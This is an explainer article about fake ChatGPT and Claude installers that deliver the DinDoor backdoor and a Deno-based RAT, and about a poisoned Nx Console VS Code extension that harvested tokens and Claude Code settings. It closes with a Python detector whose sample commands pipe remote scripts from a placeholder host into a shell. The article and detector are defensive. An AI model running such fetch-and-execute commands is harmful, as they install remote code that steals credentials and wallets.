What Fake AI Installers Are and Why They Matter
Fake AI installers are counterfeit setup packages or plugins that pretend to install tools like ChatGPT or Claude but instead drop malware that steals credentials, manipulates browsers, and quietly takes remote control of devices. These malicious downloads often sit on otherwise trusted platforms such as GitHub and SourceForge, making them look legitimate to both casual users and experienced developers. Malwarebytes reports that attackers are currently pushing bogus installers for ChatGPT, Claude, and creative tools like Ableton Live or Kontakt, all hiding a backdoor called DinDoor and a Deno-based remote access Trojan (RAT). At the same time, GitHub has confirmed that its own internal repositories were accessed through a poisoned VS Code extension, showing that supply chain attacks can succeed even against seasoned engineering teams that rely on auto-updated tools.

How Deno RAT Campaigns Turn AI Curiosity Into Compromise
The latest fake AI tools malware campaign uses social lures and open-source platforms to deliver Deno-based payloads. Compromised YouTube channels host AI-generated videos that promote “free” or “cracked” versions of ChatGPT, Claude, and music software, directing viewers to malicious GitHub or SourceForge repositories with more than 50,000 views reported. The repositories instruct users to open a terminal and paste a command that fetches an MSI or PowerShell script for Windows, or a shell script for macOS. That script installs Scoop and WinGet, then the legitimate Deno runtime, which is abused to pull the DinDoor backdoor from a remote server and run it in memory so it never hits disk. DinDoor sets persistence, phones home to its command-and-control server, and then fetches a Deno RAT that operates entirely under the attacker’s control.

What the Malware Does: Wallet Theft and Covert Screen Streaming
Once installed, the Deno-based RAT gives attackers wide control of an infected machine, turning a fake AI tools download into a long-term breach. It can execute commands and PowerShell scripts, manage files, launch or kill processes, capture screenshots, and open SOCKS5 proxy tunnels for stealthy remote access. Its built-in stealer module targets more than 50 cryptocurrency wallets and authentication data from over 70 browsers and browser extensions, making stolen wallets and credentials a likely goal. Another related payload can hijack Microsoft Edge to covertly stream the user’s screen to the attacker, allowing real-time spying on banking sessions, developer consoles, or admin portals. Because many components run in memory and the initial installer appears connected to legitimate AI tools, traditional antivirus tools and casual visual checks are less likely to catch the compromise early.

When Legitimate Tools Turn Hostile: Nx Console and GitHub’s Breach
Fake AI tools malware is only one side of the problem; the other is genuine tools suddenly becoming hostile through supply chain attacks. GitHub confirmed that attackers accessed around 3,800 internal repositories after a single employee installed a poisoned version of Nx Console, a VS Code extension with 2.2 million installs that was briefly live on the Visual Studio Marketplace. According to StepSecurity, that malicious Nx Console release harvested tokens from GitHub, npm, AWS, HashiCorp Vault, Kubernetes, 1Password, and even targeted Claude Code configuration files under ~/.claude/settings.json. Security researchers tie this activity to TeamPCP, a financially motivated group behind the Mini Shai-Hulud supply chain worm, which rapidly iterates new payloads and has compromised npm, PyPI packages, GitHub Actions, and more. The lesson is clear: auto-updating developer extensions and security tooling can become a powerful attack vector overnight.

Practical Malware Installer Detection and Safer Download Habits
You can reduce risk from GitHub security threats and supply chain attacks with a few disciplined habits. Always confirm the official distribution channel for AI tools—ChatGPT, Claude, and other major services are offered through official websites and app stores, not random GitHub repositories advertised in YouTube comments. Treat any installer that requires pasting a long terminal command from the browser as suspicious, especially if it installs package managers and runtimes you did not plan to use, such as Scoop, WinGet, or Deno. For developers, lock down extensions: restrict VS Code and IDE plugins to a vetted list, review recent release notes, and disable auto-update for critical extensions where possible. Monitor tokens, CI/CD credentials, and access keys for unusual use, and rotate them if you suspect exposure. Finally, scan downloaded installers with up-to-date security tools and avoid executing anything from unfamiliar accounts or recently created repositories.
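
The paste-a-command warning above can be turned into a quick triage check run before anything is executed. This is an added example, not code from Malwarebytes, StepSecurity, or any project named in this article; the regex patterns, the 200-character threshold, the function names, and the example.invalid sample commands are assumptions constructed for illustration.

```python
import re

# Package managers and runtime the article names as unexpected installs.
UNPLANNED_TOOLS = ("scoop", "winget", "deno")

# A download handed straight to an interpreter or installer (assumed patterns).
FETCH_EXEC = [
    re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I),
    re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b.*\|\s*(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(iex|invoke-expression)\b.*\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"\bmsiexec\b.*\s/i\s+\"?https?://", re.I),
]

LONG_COMMAND = 200  # characters; an assumed threshold, tune locally

# Constructed sample commands; example.invalid is a reserved placeholder host.
SAMPLES = {
    "ps_pipe": "irm https://example.invalid/setup.ps1 | iex",
    "sh_pipe": "curl -fsSL https://example.invalid/install.sh | sh",
    "msi_url": "msiexec /i https://example.invalid/ai-setup.msi /qn",
    "chained": "irm https://example.invalid/get.ps1 | iex; scoop install deno",
    "planned": "scoop install deno",
    "benign": "git clone https://example.invalid/org/project.git",
}


def triage(command: str) -> list[str]:
    """Return the reasons a pasted install command deserves a closer look."""
    reasons = []
    if any(p.search(command) for p in FETCH_EXEC):
        reasons.append("fetch-and-execute")
    tools = [t for t in UNPLANNED_TOOLS if re.search(rf"\b{t}\b", command, re.I)]
    if tools:
        reasons.append("installs:" + ",".join(tools))
    if len(command) > LONG_COMMAND:
        reasons.append("long-command")
    return reasons


def is_suspicious(command: str) -> bool:
    """Fetch-and-execute alone is enough; weaker signals need two hits."""
    reasons = triage(command)
    return "fetch-and-execute" in reasons or len(reasons) >= 2


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:8} suspicious={is_suspicious(cmd)} reasons={triage(cmd)}")
```

A deliberate `scoop install deno` is reported but not flagged by itself; the check escalates only when a remote script is executed directly or several signals coincide.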
